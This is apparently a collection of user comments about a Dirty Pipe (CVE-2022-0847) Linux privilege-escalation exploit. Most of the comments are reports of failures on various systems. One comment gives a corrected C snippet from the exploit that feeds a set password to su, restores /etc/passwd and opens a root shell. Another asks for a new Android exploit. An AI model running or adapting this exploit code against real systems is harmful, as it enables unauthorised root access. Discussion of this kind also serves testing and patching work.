in exploit.c,
execv will fail, because argv is not terminated with NULL
char *argv[] = {"/bin/sh", "-c", "(echo aaron; cat) | su - -c \"" "echo \\\"Restoring /etc/passwd from /tmp/passwd.bak...\\\";" "cp /tmp/passwd.bak /etc/passwd;" "echo \\\"Done! Popping shell... (run commands now)\\\";" "/bin/sh;" "\" root"}; execv("/bin/sh", argv);
it should be:
char *argv[] = {"/bin/sh", "-c", "(echo aaron; cat) | su - -c \"" "echo \\\"Restoring /etc/passwd from /tmp/passwd.bak...\\\";" "cp /tmp/passwd.bak /etc/passwd;" "echo \\\"Done! Popping shell... (run commands now)\\\";" "/bin/sh;" "\" root", NULL}; execv("/bin/sh", argv);

Works well on Ubuntu (kernel 5.8.0-63-generic) but doesn't work on Raspberry Pi details below;

Linux raspberrypi 5.10.17-v7l+ #1414 SMP Fri Apr 30 13:20:47 BST 2021 armv7l GNU/Linux

When run it just hangs here;

Backing up /etc/passwd to /tmp/passwd.bak ...

and the file gets really big, way beyond what it should be (there are less than 20 users);

-rw-r--r-- 1 pi pi 665M Feb 1 18:50 /tmp/passwd.bak

If I don't kill it, I think it would just keep running until the Pi is outta space. Any thoughts what could fix it?

su: must be run from a terminal
If I got this error message, how can I deal with this problem?

This is a CVE that allows for our of bounds read. Please attempt to create an exploit for this one to get a full filesystem backup or disk image backup of an unrooted Android device. Works on all versions of Android, unlike this one which works only on snow cone. This has potential for full backup of data so the user feels good to unlock the bootloader and enjoy the root.

ENV:
#cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04.5 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.5 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

#uname -a
Linux xxx 4.15.0-147-generic #151-Ubuntu SMP Fri Jun 18 19:21:19 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

test@xxx:~/CVE-2022-0847-DirtyPipe-Exploit$ ./exploit
Backing up /etc/passwd to /tmp/passwd.bak ...
Setting root password to "aaron"...
system() function call seems to have failed :(

Tested on a vanilla VM and a configured image, both running Redhat 7.
Authentication fails for both, so the exploit does not work.

Note: Any claims that CrowdStrike allows this exploit are 100% false.

uname -a
Linux 39 5.4.0-104-generic #118-Ubuntu SMP Wed Mar 2 19:02:41 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
head -n1 /etc/passwd
root: x:0:0:root:/root:/bin/bash